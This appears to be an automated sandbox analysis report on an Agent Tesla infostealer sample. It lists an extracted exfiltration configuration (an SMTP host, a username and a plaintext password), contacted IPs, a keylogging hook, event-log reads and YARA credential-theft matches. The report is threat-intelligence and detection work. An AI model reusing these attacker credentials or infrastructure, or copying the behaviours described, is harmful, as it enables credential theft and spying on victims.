                    Source: 8.2.InstallUtil.exe.7a0000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdbUGP source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then jmp 08A9B679h7_2_08A9B837
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then jmp 08A9AF14h7_2_08A9AEA0
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then jmp 08A9AF14h7_2_08A9AEB0
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then jmp 08A9B679h7_2_08A9B609
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then jmp 08A9B679h7_2_08A9B618
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_08AA8838
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h7_2_08AA8830
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then jmp 08AA3C58h7_2_08AA3BA0
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then jmp 08AA3C58h7_2_08AA3B98
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then jmp 08AA9FD7h7_2_08AA9D78
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_08C7D598
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h16_2_0891D598

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.7:49740 -> 163.44.198.71:587
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 163.44.198.71 163.44.198.71
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownDNS query: name: ip-api.com
                    Source: global trafficTCP traffic: 192.168.2.7:49740 -> 163.44.198.71:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: nffplp.com
                    Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: InstallUtil.exe, 00000008.00000002.1533228561.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1583372523.0000000006D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
                    Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
                    Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3804053354.0000000000C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
                    Source: InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: InstallUtil.exe, 00000012.00000002.3802503434.0000000000BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting-
                    Source: InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting1
                    Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nffplp.com
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005709000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004D92000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: InstallUtil.exe, 00000008.00000002.1517390065.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1533228561.0000000004DC3000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3802503434.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3804053354.0000000000C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1517390065.0000000002691000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004651000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3806878045.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1583372523.0000000006D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.1506272943.00000000007A2000.00000040.00000400.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004E44000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1507134663.000000000065F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005709000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000056B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, POq2Ux.cs.Net Code: mDt2FXita0Y
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Reads the Security eventlog
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Reads the System eventlog
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: Process Memory Space: ilZhNx3JAc.bat.Dmf PID: 6764, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
